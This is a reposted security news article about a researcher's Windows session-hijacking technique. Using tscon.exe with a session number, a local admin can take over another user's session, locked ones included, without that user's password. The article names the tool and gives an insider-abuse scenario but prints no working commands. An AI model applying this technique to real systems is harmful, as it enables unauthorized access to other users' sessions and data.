Hacker News: Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password

Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password

You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users’ session, including domain admin/system user, without knowing their passwords?

Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack the session of any logged-in Windows user who has higher privileges without knowing that user’s password, using built-in command line tools.

This trick works on almost all versions of Windows operating system and does not require any special privileges. Korznikov is himself unable to figure out if it is a Windows feature or a security flaw.

The issue discovered by Korznikov is not entirely new, as a French security researcher, namely Benjamin Delpy, detailed a similar user session hijacking technique on his blog some six years ago.

Korznikov calls the attack a “privilege escalation and session hijacking,” which could allow an attacker to hijack high-privileged users’ session and gain unauthorized access to applications and other sensitive data.

For successful exploitation, an attacker requires physical access to the targeted machine, but using Remote Desktop Protocol (RDP) session on a hacked machine; the attack can be performed remotely as well.

Video Demonstrations and PoC Exploit Released!

Korznikov has also provided a few video demonstrations of a successful session hijacking (using Task manager, service creation, as well as command line), along with Proof-of-Concept (PoC) exploit.

Korznikov successfully tested the flaw on the newest Windows 10, Windows 7, Windows Server 2008 and Windows Server 2012 R2, though another researcher confirmed on Twitter that the flaw works on every Windows version, even if the workstation is locked.

While Microsoft does not deem it to be a security vulnerability and some experts argued that a Windows user with administrative permissions can do anything, Korznikov explained a simple attack scenario to explain how a malicious insider can easily misuse this flaw:

“Some bank employee have access to the billing system and its credentials to log in. One day, he comes to work, logging into the billing system and start to work. At lunchtime, he locks his workstation and goes out for lunch. Meanwhile, the system administrator gets to can use this exploit to access employee’s workstation.”

“According to the bank’s policy, administrator’s account should not have access to the billing system, but with a couple of built-in commands in windows, this system administrator will hijack employee’s desktop which he left locked. From now, a sysadmin can perform malicious actions in billing system as billing employee account.”

Well, no doubt, alternatively an attacker can also dump out system memory to retrieve users’ passwords in plaintext, but this is a long and complicated process compared to just running tscon.exe with a session number without leaving any trace and using any external tool.

The issue has been known to Microsoft since last six years, so it’s likely the company doesn’t consider it a security flaw as it requires local admin rights on the computer, and deems this is how its operating system is supposed to behave.

Mohit Kumar - Hacking News
Entrepreneur, Hacker, Speaker, Founder and CEO — The Hacker News and The Hackers Conference.
Advertisements

♥Thanks for sharing♥

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s